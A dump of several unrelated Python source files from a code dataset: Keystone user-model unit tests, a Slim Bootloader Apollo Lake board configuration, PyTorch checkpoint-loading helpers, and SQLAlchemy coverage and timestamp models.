from keystone.test import utils as testutils
class TestModelsUser(unittest.TestCase):
'''Unit tests for keystone/models.py:User class.'''
def test_user(self):
user = User()
self.assertEquals(str(user.__class__),
"<class 'keystone.models.User'>",
"user should be of instance "
"class keystone.models.User but instead "
"was '%s'" % str(user.__class__))
self.assertIsInstance(user, dict, "")
def test_user_static_properties(self):
user = User(id=1, name="the user", blank=None)
self.assertEquals(user.id, 1)
self.assertEquals(user.name, "the user")
self.assertRaises(AttributeError, getattr, user,
'some_bad_property')
def test_user_properties(self):
user = User(id=1, name="the user", blank=None)
user["dynamic"] = "test"
self.assertEquals(user["dynamic"], "test")
def test_user_json_serialization(self):
user = User(id=1, name="the user", blank=None)
user["dynamic"] = "test"
json_str = user.to_json()
d1 = json.loads(json_str)
d2 = json.loads('{"user": {"name": "the user", \
"id": 1, "dynamic": "test"}}')
self.assertDictEqual(d1, d2)
def test_user_xml_serialization(self):
user = User(id=1, name="the user", blank=None)
xml_str = user.to_xml()
self.assertTrue(testutils.XMLTools.xmlEqual(xml_str,
'<user name="the user" id="1"/>'))
def test_user_json_deserialization(self):
user = User.from_json('{"name": "the user", "id": 1}',
hints={"contract_attributes": ['id', 'name']})
self.assertIsInstance(user, User)
self.assertEquals(user.id, 1)
self.assertEquals(user.name, "the user")
def test_user_xml_deserialization(self):
user = User(id=1, name="the user", blank=None)
self.assertIsInstance(user, User)
def test_user_inspection(self):
user = User(id=1, name="the user", blank=None)
self.assertFalse(user.inspect())
def test_user_validation(self):
user = User(id=1, name="the user", blank=None)
self.assertTrue(user.validate())
if __name__ == '__main__':
unittest.main()
|
the-stack_0_6260 | ## @file
# This file is used to provide board specific image information.
#
# Copyright (c) 2017 - 2020, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
import os
import sys
sys.dont_write_bytecode = True
sys.path.append (os.path.join('..', '..'))
from BuildLoader import FLASH_MAP, BaseBoard, STITCH_OPS
from BuildLoader import IPP_CRYPTO_OPTIMIZATION_MASK, IPP_CRYPTO_ALG_MASK
#
# Temporary Memory Layout for APL
#
# FF000000 +--------------------------+
# | Stage1B |
# | (Decompressed) |
# FEF80000 +--------------------------+
# | Stage1 Heap/Stack |
# FEF70000 +--------------------------+
# | Not Used |
# +-------------+------------+
# | Free |
# | |------------|
# +-------------+ MRC NVS |
# | | |
# FEF40000 +- Stage1B -+------------+
# | Compressed | FSP Mem |
# FEF16000 | +------------+
# | | |
# FEF10000 --------------+------------+
# | N/A (Don't use) |
# FEF08000 +--------------------------+
# | Stage1A |
# FEF00000 +--------------------------+
#
class Board(BaseBoard):
def __init__(self, *args, **kwargs):
super(Board, self).__init__(*args, **kwargs)
self.VERINFO_IMAGE_ID = 'SB_APLI '
self.VERINFO_PROJ_MAJOR_VER = 1
self.VERINFO_PROJ_MINOR_VER = 0
self.VERINFO_SVN = 1
self.VERINFO_BUILD_DATE = '05/20/2018'
self.BOARD_NAME = 'apl'
self.BOARD_PKG_NAME = 'ApollolakeBoardPkg'
self.SILICON_PKG_NAME = 'ApollolakePkg'
self._PCI_ENUM_DOWNGRADE_PMEM64 = 1
self.PCI_IO_BASE = 0x00001000
self.PCI_MEM32_BASE = 0x80000000
self.PCI_MEM64_BASE = 0x400000000
self.FLASH_SIZE = 0x800000
self.FLASH_BASE = self.FLASH_LAYOUT_START - self.FLASH_SIZE
self.HAVE_VBT_BIN = 1
self.HAVE_VERIFIED_BOOT = 1
self.HAVE_MEASURED_BOOT = 0
self.HAVE_SEED_LIST = 0
self.HAVE_PSD_TABLE = 1
self.ENABLE_SMBIOS = 1
self.ENABLE_FSP_LOAD_IMAGE = 0
self.ENABLE_VTD = 1
self.ENABLE_FWU = 1
self.ENABLE_SPLASH = 1
self.ENABLE_FRAMEBUFFER_INIT = 1
self.ENABLE_GRUB_CONFIG = 1
self.ENABLE_DMA_PROTECTION = 0
# G9 for 384 | W7 Opt for SHA384| Ni Opt for SHA256| V8 Opt for SHA256
self.ENABLE_CRYPTO_SHA_OPT = IPP_CRYPTO_OPTIMIZATION_MASK['SHA256_NI']
# To enable source debug, set 1 to self.ENABLE_SOURCE_DEBUG
# self.ENABLE_SOURCE_DEBUG = 1
# Temporary skip Stage1A due to 32KB(IBBL) size limitation
# until library size optimization has done.
# If ENABLE_SOURCE_DEBUG is disabled, SKIP_STAGE1A_SOURCE_DEBUG will be ignored
self.SKIP_STAGE1A_SOURCE_DEBUG = 1
# BIT0:Serial BIT1:USB KB
# Support serial port input console by default
self.CONSOLE_IN_DEVICE_MASK = 0x00000001
# BIT0:Serial BIT1:GFX
self.CONSOLE_OUT_DEVICE_MASK = 0x00000001
# Mem | NVMe | Usb | Spi | Ufs | eMMC | SD | Sata
self.BOOT_MEDIA_SUPPORT_MASK = 0xBF
# EXT | FAT
self.FILE_SYSTEM_SUPPORT_MASK = 3
# Verify required minimum FSP version
self.MIN_FSP_REVISION = 0x01040301
# Verify FSP image ID. Empty string means skipping verification
self.FSP_IMAGE_ID = '$APLFSP$'
self.STAGE1A_SIZE = 0x00008000
self.STAGE1B_SIZE = 0x00035000
if self.ENABLE_SOURCE_DEBUG:
self.STAGE1B_SIZE += 0x2000
self.STAGE2_SIZE = 0x00032000
self.PAYLOAD_SIZE = 0x0001F000
if len(self._PAYLOAD_NAME.split(';')) > 1:
# EPAYLOAD is specified
self.EPAYLOAD_SIZE = 0x00130000
self.UEFI_VARIABLE_SIZE = 0x00040000
else:
# EPAYLOAD does not exist, create a dummy one
self.EPAYLOAD_SIZE = 0x1000
self.UEFI_VARIABLE_SIZE = 0x1000
if self.FSPDEBUG_MODE == 1:
self.STAGE1B_SIZE += 0x00009000
self.STAGE2_SIZE += 0x0000F000
self.STAGE1A_XIP = 0
self.STAGE1A_LOAD_BASE = 0xFEF00000
self.STAGE1B_XIP = 0
self.STAGE1B_LOAD_BASE = 0xFEF10000
self.STAGE1B_FD_BASE = 0xFEF80000
self.STAGE1B_FD_SIZE = 0x0006B000
if self.RELEASE_MODE == 0:
self.STAGE1B_FD_SIZE += 0x00002000
self.PAYLOAD_SIZE += 0x00005000
# For Stage2, it is always compressed.
# if STAGE2_LOAD_HIGH is 1, STAGE2_FD_BASE will be ignored
self.STAGE2_FD_BASE = 0x01000000
self.STAGE2_FD_SIZE = 0x00080000
self.STAGE2_LOAD_BASE = 0x00100000
self.STAGE1_STACK_SIZE = 0x00002000
self.STAGE1_DATA_SIZE = 0x0000E000
# Offset is relative to the temporary memory base 0xFEF00000
self.STAGE1_STACK_BASE_OFFSET = 0x00080000 - (self.STAGE1_STACK_SIZE + self.STAGE1_DATA_SIZE)
# To support large payload such as UEFI
self.LOADER_RSVD_MEM_SIZE = 0x00B8C000
self.PLD_RSVD_MEM_SIZE = 0x00500000
self.PLD_HEAP_SIZE = 0x04000000
self.FWUPDATE_SIZE = 0x00020000
self.CFGDATA_SIZE = 0x00004000
self.KEYHASH_SIZE = 0x00001000
self.CFG_DATABASE_SIZE = self.CFGDATA_SIZE
self.MRCDATA_SIZE = 0x00004000
self.VARIABLE_SIZE = 0x00002000
self.S3_DEBUG = 0
self.SBLRSVD_SIZE = 0x00001000
if len(self._PAYLOAD_NAME.split(';')) > 1:
self.SPI_IAS1_SIZE = 0x00001000
else:
self.SPI_IAS1_SIZE = 0x00150000
self._CFGDATA_INT_FILE = ['CfgData_Int_LeafHill.dlt']
self._CFGDATA_EXT_FILE = ['CfgData_Ext_Gpmrb.dlt', 'CfgData_Ext_Up2.dlt','CfgData_Ext_OxbHill.dlt','CfgData_Ext_MB3.dlt','CfgData_Ext_JuniperHill.dlt']
# If mulitple VBT table support is required, list them as:
# {VbtImageId1 : VbtFileName1, VbtImageId2 : VbtFileName2, ...}
# VbtImageId is ID to identify a VBT image. It is a UINT32 number to match
# the ImageId field in the VBT container.
# VbtFileName is the VBT file name. It needs to be located under platform
# VbtBin folder.
self._MULTI_VBT_FILE = {1:'Vbt.dat', 2:'Vbt_Up2.dat'}
def GetPlatformDsc (self):
dsc = {}
common_libs = [
'LoaderLib|Platform/$(BOARD_PKG_NAME)/Library/LoaderLib/LoaderLib.inf',
'SerialPortLib|Silicon/$(SILICON_PKG_NAME)/Library/SerialPortLib/SerialPortLib.inf',
'SocInfoLib|Silicon/$(SILICON_PKG_NAME)/Library/SocInfoLib/SocInfoLib.inf',
'PlatformHookLib|Silicon/$(SILICON_PKG_NAME)/Library/PlatformHookLib/PlatformHookLib.inf',
'ScSbiAccessLib|Silicon/$(SILICON_PKG_NAME)/Library/ScSbiAccessLib/ScSbiAccessLib.inf',
'GpioLib|Silicon/$(SILICON_PKG_NAME)/Library/GpioLib/GpioLib.inf',
'PchSpiLib|Silicon/CommonSocPkg/Library/PchSpiLib/PchSpiLib.inf',
'SpiFlashLib|Silicon/CommonSocPkg/Library/SpiFlashLib/SpiFlashLib.inf',
'IgdOpRegionLib|Silicon/$(SILICON_PKG_NAME)/Library/IgdOpRegionLib/IgdOpRegionLib.inf',
'IocIpcLib|Platform/$(BOARD_PKG_NAME)/Library/IocIpcLib/IocIpcLib.inf',
'BootGuardLib|Silicon/$(SILICON_PKG_NAME)/Library/BootGuardLib20/BootGuardLib20.inf',
'HeciLib|Silicon/ApollolakePkg/Library/HeciLib/HeciLib.inf',
'PsdLib|Silicon/ApollolakePkg/Library/PsdLib/PsdLib.inf',
'ShellExtensionLib|Platform/$(BOARD_PKG_NAME)/Library/ShellExtensionLib/ShellExtensionLib.inf',
'BootMediaLib|Silicon/ApollolakePkg/Library/BootMediaLib/BootMediaLib.inf',
'FlashDescriptorLib|Silicon/ApollolakePkg/Library/FlashDescriptorLib/FlashDescriptorLib.inf',
'VtdLib|Silicon/$(SILICON_PKG_NAME)/Library/VtdLib/VtdLib.inf',
'SmbusLib|Silicon/$(SILICON_PKG_NAME)/Library/SmbusLib/SmbusLib.inf',
'HdaLib|Platform/$(BOARD_PKG_NAME)/Library/HdaLib/HdaLib.inf',
'VtdPmrLib|Silicon/CommonSocPkg/Library/VtdPmrLib/VtdPmrLib.inf',
'BaseIpcLib|Silicon/$(SILICON_PKG_NAME)/Library/BaseIpcLib/BaseIpcLib.inf'
]
dsc['LibraryClasses.%s' % self.BUILD_ARCH] = common_libs
return dsc
def GetFlashMapList (self):
img_list = self.GetImageLayout ()
comp_list = []
offset = 0
# Skip Stitch_IPAD and Stitch_OPAD for flash map
for img in img_list[2:][::-1]:
child = img[1][0]
if child[3] & STITCH_OPS.MODE_FILE_IGNOR:
continue
bname = os.path.splitext(child[0])[0]
comp = {'name':child[0], 'bname':bname, 'offset':offset, 'size':child[2], 'flag': FLASH_MAP.FLASH_MAP_DESC_FLAGS['COMPRESSED'] if child[1] else 0}
if bname in ['STAGE1A', 'STAGE1B', 'STAGE2', 'FWUPDATE', 'CFGDATA', 'MRCDATA', 'PAYLOAD', 'VARIABLE']:
comp['flag'] |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']
else:
comp['flag'] |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']
comp_list.append (comp)
offset += child[2]
flag = FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']
comp_list.append ({'name':'SBLRSVD.bin','bname':'SBLRSVD','offset':0, 'size':self.SBLRSVD_SIZE, 'flag': FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']})
comp_list.append ({'name':'BPM.bin', 'bname':'BPM', 'offset':0, 'size':0, 'flag': flag})
return comp_list[::-1]
def GetOutputImages (self):
# define extra images that will be copied to output folder
img_list = ['SlimBootloader.txt',
'CfgDataStitch.py',
'CfgDataDef.yaml',
'CfgDataInt.bin'
]
return img_list
def GetKeyHashList (self):
# Define a set of new key used for different purposes
# The key is either key id or public key PEM format or private key PEM format
pub_key_list = [
(
# Key for verifying Config data blob
HASH_USAGE['PUBKEY_CFG_DATA'],
'KEY_ID_CFGDATA' + '_' + self._RSA_SIGN_TYPE
),
(
# Key for verifying firmware update
HASH_USAGE['PUBKEY_FWU'],
'KEY_ID_FIRMWAREUPDATE' + '_' + self._RSA_SIGN_TYPE
),
(
# Key for verifying container header
HASH_USAGE['PUBKEY_CONT_DEF'],
'KEY_ID_CONTAINER' + '_' + self._RSA_SIGN_TYPE
),
(
# key for veryfying OS image.
HASH_USAGE['PUBKEY_OS'],
'KEY_ID_OS1_PUBLIC' + '_' + self._RSA_SIGN_TYPE
),
]
return pub_key_list
def GetImageLayout (self):
ias1_flag = 0 if self.SPI_IAS1_SIZE > 0 else STITCH_OPS.MODE_FILE_IGNOR
fwu_flag = 0 if self.ENABLE_FWU else STITCH_OPS.MODE_FILE_IGNOR
img_list = []
img_list.extend ([
# Padding to ensure all other components in OBB partition will be aligned at 4KB boundary
# 0xB00 assumes (IBBP.man, BPM.met) + (IPAD, IBBL, IBBM, OBB, FWUP, CFGD, PLD, VAR, MRCD) in BpdtIBB
# 0x180 assumes (OPAD, PROV, EPLD) in BpdtOBB
# If more files are added, the offset needs to be adjusted accordingly
('Stitch_IPAD.bin', [
('PADDING.bin', '', 0xB00, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_OPAD.bin', [
('PADDING.bin', '', 0x180, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_FWU.bin', [
('FWUPDATE.bin' , 'Lzma', self.FWUPDATE_SIZE, STITCH_OPS.MODE_FILE_PAD | fwu_flag, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_FB.bin', [
('SPI_IAS1.bin', '', self.SPI_IAS1_SIZE, STITCH_OPS.MODE_FILE_PAD | ias1_flag, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_PLD.bin', [
('PAYLOAD.bin', 'Lz4', self.PAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_VAR.bin', [
('VARIABLE.bin', '', self.VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_MRCDATA.bin', [
('MRCDATA.bin', '', self.MRCDATA_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_CFGDATA.bin', [
('CFGDATA.bin', '', self.CFGDATA_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_KEYHASH.bin', [
('KEYHASH.bin', '', self.KEYHASH_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_OBB.bin', [
('STAGE2.fd', 'Lz4', self.STAGE2_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_IBBM.bin', [
('STAGE1B.fd', 'Lz4', self.STAGE1B_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_IBBL.bin', [
('STAGE1A.fd', '', self.STAGE1A_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_EPLD.bin', [
('EPAYLOAD.bin', '', self.EPAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_UVAR.bin', [
('UEFIVARIABLE.bin', '', self.UEFI_VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)],
),
])
return img_list
|
the-stack_0_6263 | import torch
import os
from collections import OrderedDict
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
def load_checkpoint(model, checkpoint_path):
if checkpoint_path and os.path.isfile(checkpoint_path):
print("=> Loading checkpoint '{}'".format(checkpoint_path))
checkpoint = torch.load(checkpoint_path)
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
new_state_dict = OrderedDict()
for k, v in checkpoint['state_dict'].items():
if k.startswith('module'):
name = k[7:] # remove `module.`
else:
name = k
new_state_dict[name] = v
model.load_state_dict(new_state_dict)
else:
model.load_state_dict(checkpoint)
print("=> Loaded checkpoint '{}'".format(checkpoint_path))
else:
print("=> Error: No checkpoint found at '{}'".format(checkpoint_path))
raise FileNotFoundError()
def load_pretrained(model, url, filter_fn=None, strict=True):
state_dict = load_state_dict_from_url(url, progress=False, map_location='cpu')
input_conv = 'conv_stem'
classifier = 'classifier'
in_chans = getattr(model, input_conv).weight.shape[1]
num_classes = getattr(model, classifier).weight.shape[0]
input_conv_weight = input_conv + '.weight'
pretrained_in_chans = state_dict[input_conv_weight].shape[1]
if in_chans != pretrained_in_chans:
if in_chans == 1:
print('=> Converting pretrained input conv {} from {} to 1 channel'.format(
input_conv_weight, pretrained_in_chans))
conv1_weight = state_dict[input_conv_weight]
state_dict[input_conv_weight] = conv1_weight.sum(dim=1, keepdim=True)
else:
print('=> Discarding pretrained input conv {} since input channel count != {}'.format(
input_conv_weight, pretrained_in_chans))
del state_dict[input_conv_weight]
strict = False
classifier_weight = classifier + '.weight'
pretrained_num_classes = state_dict[classifier_weight].shape[0]
if num_classes != pretrained_num_classes:
print('=> Discarding pretrained classifier since num_classes != {}'.format(pretrained_num_classes))
del state_dict[classifier_weight]
del state_dict[classifier + '.bias']
strict = False
if filter_fn is not None:
state_dict = filter_fn(state_dict)
model.load_state_dict(state_dict, strict=strict)
|
the-stack_0_6264 | # encoding: utf-8
# BaseCoverageRecord, Timestamp, CoverageRecord, WorkCoverageRecord
from . import (
Base,
get_one,
get_one_or_create,
)
import datetime
from sqlalchemy import (
Column,
DateTime,
Enum,
ForeignKey,
Index,
Integer,
String,
Unicode,
UniqueConstraint,
)
from sqlalchemy.orm.session import Session
from sqlalchemy.sql.expression import (
and_,
or_,
literal,
literal_column,
)
class BaseCoverageRecord(object):
"""Contains useful constants used by both CoverageRecord and
WorkCoverageRecord.
"""
SUCCESS = u'success'
TRANSIENT_FAILURE = u'transient failure'
PERSISTENT_FAILURE = u'persistent failure'
REGISTERED = u'registered'
ALL_STATUSES = [REGISTERED, SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE]
# Count coverage as attempted if the record is not 'registered'.
PREVIOUSLY_ATTEMPTED = [SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE]
# By default, count coverage as present if it ended in
# success or in persistent failure. Do not count coverage
# as present if it ended in transient failure.
DEFAULT_COUNT_AS_COVERED = [SUCCESS, PERSISTENT_FAILURE]
status_enum = Enum(SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE,
REGISTERED, name='coverage_status')
@classmethod
def not_covered(cls, count_as_covered=None,
count_as_not_covered_if_covered_before=None):
"""Filter a query to find only items without coverage records.
:param count_as_covered: A list of constants that indicate
types of coverage records that should count as 'coverage'
for purposes of this query.
:param count_as_not_covered_if_covered_before: If a coverage record
exists, but is older than the given date, do not count it as
covered.
:return: A clause that can be passed in to Query.filter().
"""
if not count_as_covered:
count_as_covered = cls.DEFAULT_COUNT_AS_COVERED
elif isinstance(count_as_covered, basestring):
count_as_covered = [count_as_covered]
# If there is no coverage record, then of course the item is
# not covered.
missing = cls.id==None
# If we're looking for specific coverage statuses, then a
# record does not count if it has some other status.
missing = or_(
missing, ~cls.status.in_(count_as_covered)
)
# If the record's timestamp is before the cutoff time, we
# don't count it as covered, regardless of which status it
# has.
if count_as_not_covered_if_covered_before:
missing = or_(
missing, cls.timestamp < count_as_not_covered_if_covered_before
)
return missing
class Timestamp(Base):
"""Tracks the activities of Monitors, CoverageProviders,
and general scripts.
"""
__tablename__ = 'timestamps'
MONITOR_TYPE = "monitor"
COVERAGE_PROVIDER_TYPE = "coverage_provider"
SCRIPT_TYPE = "script"
# A stand-in value used to indicate that a field in the timestamps
# table should be explicitly set to None. Passing in None for most
# fields will use default values.
CLEAR_VALUE = object()
service_type_enum = Enum(
MONITOR_TYPE, COVERAGE_PROVIDER_TYPE, SCRIPT_TYPE,
name="service_type",
)
# Unique ID
id = Column(Integer, primary_key=True)
# Name of the service.
service = Column(String(255), index=True, nullable=False)
# Type of the service -- monitor, coverage provider, or script.
# If the service type does not fit into these categories, this field
# can be left null.
service_type = Column(service_type_enum, index=True, default=None)
# The collection, if any, associated with this service -- some services
# run separately on a number of collections.
collection_id = Column(Integer, ForeignKey('collections.id'),
index=True, nullable=True)
# The last time the service _started_ running.
start = Column(DateTime, nullable=True)
# The last time the service _finished_ running. In most cases this
# is the 'timestamp' proper.
finish = Column(DateTime)
# A description of the things the service achieved during its last
# run. Each service may decide for itself what counts as an
# 'achievement'; this is just a way to distinguish services that
# do a lot of things from services that do a few things, or to see
# services that run to completion but don't actually do anything.
achievements = Column(Unicode, nullable=True)
# This column allows a service to keep one item of state between
# runs. For example, a monitor that iterates over a database table
# needs to keep track of the last database ID it processed.
counter = Column(Integer, nullable=True)
# The exception, if any, that stopped the service from running
# during its previous run.
exception = Column(Unicode, nullable=True)
def __repr__(self):
format = '%b %d, %Y at %H:%M'
if self.finish:
finish = self.finish.strftime(format)
else:
finish = None
if self.start:
start = self.start.strftime(format)
else:
start = None
if self.collection:
collection = self.collection.name
else:
collection = None
message = u"<Timestamp %s: collection=%s, start=%s finish=%s counter=%s>" % (
self.service, collection, start, finish, self.counter
)
return message
@classmethod
def lookup(cls, _db, service, service_type, collection):
return get_one(
_db, Timestamp, service=service, service_type=service_type,
collection=collection
)
@classmethod
def value(cls, _db, service, service_type, collection):
"""Return the current value of the given Timestamp, if it exists.
"""
stamp = cls.lookup(_db, service, service_type, collection)
if not stamp:
return None
return stamp.finish
@classmethod
def stamp(
cls, _db, service, service_type, collection=None, start=None,
finish=None, achievements=None, counter=None, exception=None
):
"""Set a Timestamp, creating it if necessary.
This should be called once a service has stopped running,
whether or not it was able to complete its task.
:param _db: A database connection.
:param service: The name of the service associated with the Timestamp.
:param service_type: The type of the service associated with
the Timestamp. This must be one of the values in
Timestmap.service_type_enum.
:param collection: The Collection, if any, on which this service
just ran.
:param start: The time at which this service started running.
Defaults to now.
:param finish: The time at which this service stopped running.
Defaults to now.
:param achievements: A human-readable description of what the service
did during its run.
:param counter: An integer item of state that the service may use
to track its progress between runs.
:param exception: A stack trace for the exception, if any, which
stopped the service from running.
"""
if start is None and finish is None:
start = finish = datetime.datetime.utcnow()
elif start is None:
start = finish
elif finish is None:
finish = start
stamp, was_new = get_one_or_create(
_db, Timestamp,
service=service,
service_type=service_type,
collection=collection,
)
stamp.update(start, finish, achievements, counter, exception)
# Committing immediately reduces the risk of contention.
_db.commit()
return stamp
def update(self, start=None, finish=None, achievements=None,
counter=None, exception=None):
"""Use a single method to update all the fields that aren't
used to identify a Timestamp.
"""
if start is not None:
if start is self.CLEAR_VALUE:
# In most cases, None is not a valid value for
# Timestamp.start, but this can be overridden.
start = None
self.start = start
if finish is not None:
if finish is self.CLEAR_VALUE:
# In most cases, None is not a valid value for
# Timestamp.finish, but this can be overridden.
finish = None
self.finish = finish
if achievements is not None:
if achievements is self.CLEAR_VALUE:
achievements = None
self.achievements = achievements
if counter is not None:
if counter is self.CLEAR_VALUE:
counter = None
self.counter = counter
# Unlike the other fields, None is the default value for
# .exception, so passing in None to mean "use the default" and
# None to mean "no exception" mean the same thing. But we'll
# support CLEAR_VALUE anyway.
if exception is self.CLEAR_VALUE:
exception = None
self.exception = exception
def to_data(self):
"""Convert this Timestamp to an unfinalized TimestampData."""
from ..metadata_layer import TimestampData
return TimestampData(
start=self.start, finish=self.finish,
achievements=self.achievements, counter=self.counter
)
__table_args__ = (
UniqueConstraint('service', 'collection_id'),
)
class CoverageRecord(Base, BaseCoverageRecord):
"""A record of a Identifier being used as input into some process."""
__tablename__ = 'coveragerecords'
SET_EDITION_METADATA_OPERATION = u'set-edition-metadata'
CHOOSE_COVER_OPERATION = u'choose-cover'
REAP_OPERATION = u'reap'
IMPORT_OPERATION = u'import'
RESOLVE_IDENTIFIER_OPERATION = u'resolve-identifier'
REPAIR_SORT_NAME_OPERATION = u'repair-sort-name'
METADATA_UPLOAD_OPERATION = u'metadata-upload'
id = Column(Integer, primary_key=True)
identifier_id = Column(
Integer, ForeignKey('identifiers.id'), index=True)
# If applicable, this is the ID of the data source that took the
# Identifier as input.
data_source_id = Column(
Integer, ForeignKey('datasources.id')
)
operation = Column(String(255), default=None)
timestamp = Column(DateTime, index=True)
status = Column(BaseCoverageRecord.status_enum, index=True)
exception = Column(Unicode, index=True)
# If applicable, this is the ID of the collection for which
# coverage has taken place. This is currently only applicable
# for Metadata Wrangler coverage.
collection_id = Column(
Integer, ForeignKey('collections.id'), nullable=True
)
__table_args__ = (
Index(
'ix_identifier_id_data_source_id_operation',
identifier_id, data_source_id, operation,
unique=True, postgresql_where=collection_id.is_(None)),
Index(
'ix_identifier_id_data_source_id_operation_collection_id',
identifier_id, data_source_id, operation, collection_id,
unique=True
),
)
def __repr__(self):
template = '<CoverageRecord: %(timestamp)s identifier=%(identifier_type)s/%(identifier)s data_source="%(data_source)s"%(operation)s status="%(status)s" %(exception)s>'
return self.human_readable(template)
def human_readable(self, template):
"""Interpolate data into a human-readable template."""
if self.operation:
operation = ' operation="%s"' % self.operation
else:
operation = ''
if self.exception:
exception = ' exception="%s"' % self.exception
else:
exception = ''
return template % dict(
timestamp=self.timestamp.strftime("%Y-%m-%d %H:%M:%S"),
identifier_type=self.identifier.type,
identifier=self.identifier.identifier,
data_source=self.data_source.name,
operation=operation,
status=self.status,
exception=exception,
)
@classmethod
def lookup(cls, edition_or_identifier, data_source, operation=None,
collection=None):
from datasource import DataSource
from edition import Edition
from identifier import Identifier
_db = Session.object_session(edition_or_identifier)
if isinstance(edition_or_identifier, Identifier):
identifier = edition_or_identifier
elif isinstance(edition_or_identifier, Edition):
identifier = edition_or_identifier.primary_identifier
else:
raise ValueError(
"Cannot look up a coverage record for %r." % edition)
if isinstance(data_source, basestring):
data_source = DataSource.lookup(_db, data_source)
return get_one(
_db, CoverageRecord,
identifier=identifier,
data_source=data_source,
operation=operation,
collection=collection,
on_multiple='interchangeable',
)
@classmethod
def add_for(self, edition, data_source, operation=None, timestamp=None,
status=BaseCoverageRecord.SUCCESS, collection=None):
from edition import Edition
from identifier import Identifier
_db = Session.object_session(edition)
if isinstance(edition, Identifier):
identifier = edition
elif isinstance(edition, Edition):
identifier = edition.primary_identifier
else:
raise ValueError(
"Cannot create a coverage record for %r." % edition)
timestamp = timestamp or datetime.datetime.utcnow()
coverage_record, is_new = get_one_or_create(
_db, CoverageRecord,
identifier=identifier,
data_source=data_source,
operation=operation,
collection=collection,
on_multiple='interchangeable'
)
coverage_record.status = status
coverage_record.timestamp = timestamp
return coverage_record, is_new
@classmethod
def bulk_add(cls, identifiers, data_source, operation=None, timestamp=None,
status=BaseCoverageRecord.SUCCESS, exception=None, collection=None,
force=False,
):
"""Create and update CoverageRecords so that every Identifier in
`identifiers` has an identical record.
"""
from identifier import Identifier
if not identifiers:
# Nothing to do.
return
_db = Session.object_session(identifiers[0])
timestamp = timestamp or datetime.datetime.utcnow()
identifier_ids = [i.id for i in identifiers]
equivalent_record = and_(
cls.operation==operation,
cls.data_source==data_source,
cls.collection==collection,
)
updated_or_created_results = list()
if force:
# Make sure that works that previously had a
# CoverageRecord for this operation have their timestamp
# and status updated.
update = cls.__table__.update().where(and_(
cls.identifier_id.in_(identifier_ids),
equivalent_record,
)).values(
dict(timestamp=timestamp, status=status, exception=exception)
).returning(cls.id, cls.identifier_id)
updated_or_created_results = _db.execute(update).fetchall()
already_covered = _db.query(cls.id, cls.identifier_id).filter(
equivalent_record,
cls.identifier_id.in_(identifier_ids),
).subquery()
# Make sure that any identifiers that need a CoverageRecord get one.
# The SELECT part of the INSERT...SELECT query.
data_source_id = data_source.id
collection_id = None
if collection:
collection_id = collection.id
new_records = _db.query(
Identifier.id.label('identifier_id'),
literal(operation, type_=String(255)).label('operation'),
literal(timestamp, type_=DateTime).label('timestamp'),
literal(status, type_=BaseCoverageRecord.status_enum).label('status'),
literal(exception, type_=Unicode).label('exception'),
literal(data_source_id, type_=Integer).label('data_source_id'),
literal(collection_id, type_=Integer).label('collection_id'),
).select_from(Identifier).outerjoin(
already_covered, Identifier.id==already_covered.c.identifier_id,
).filter(already_covered.c.id==None)
new_records = new_records.filter(Identifier.id.in_(identifier_ids))
# The INSERT part.
insert = cls.__table__.insert().from_select(
[
literal_column('identifier_id'),
literal_column('operation'),
literal_column('timestamp'),
literal_column('status'),
literal_column('exception'),
literal_column('data_source_id'),
literal_column('collection_id'),
],
new_records
).returning(cls.id, cls.identifier_id)
inserts = _db.execute(insert).fetchall()
updated_or_created_results.extend(inserts)
_db.commit()
# Default return for the case when all of the identifiers were
# ignored.
new_records = list()
ignored_identifiers = identifiers
new_and_updated_record_ids = [r[0] for r in updated_or_created_results]
impacted_identifier_ids = [r[1] for r in updated_or_created_results]
if new_and_updated_record_ids:
new_records = _db.query(cls).filter(cls.id.in_(
new_and_updated_record_ids
)).all()
ignored_identifiers = filter(
lambda i: i.id not in impacted_identifier_ids, identifiers
)
return new_records, ignored_identifiers
Index("ix_coveragerecords_data_source_id_operation_identifier_id", CoverageRecord.data_source_id, CoverageRecord.operation, CoverageRecord.identifier_id)
class WorkCoverageRecord(Base, BaseCoverageRecord):
"""A record of some operation that was performed on a Work.
This is similar to CoverageRecord, which operates on Identifiers,
but since Work identifiers have no meaning outside of the database,
we presume that all the operations involve internal work only,
and as such there is no data_source_id.
"""
__tablename__ = 'workcoveragerecords'
CHOOSE_EDITION_OPERATION = u'choose-edition'
CLASSIFY_OPERATION = u'classify'
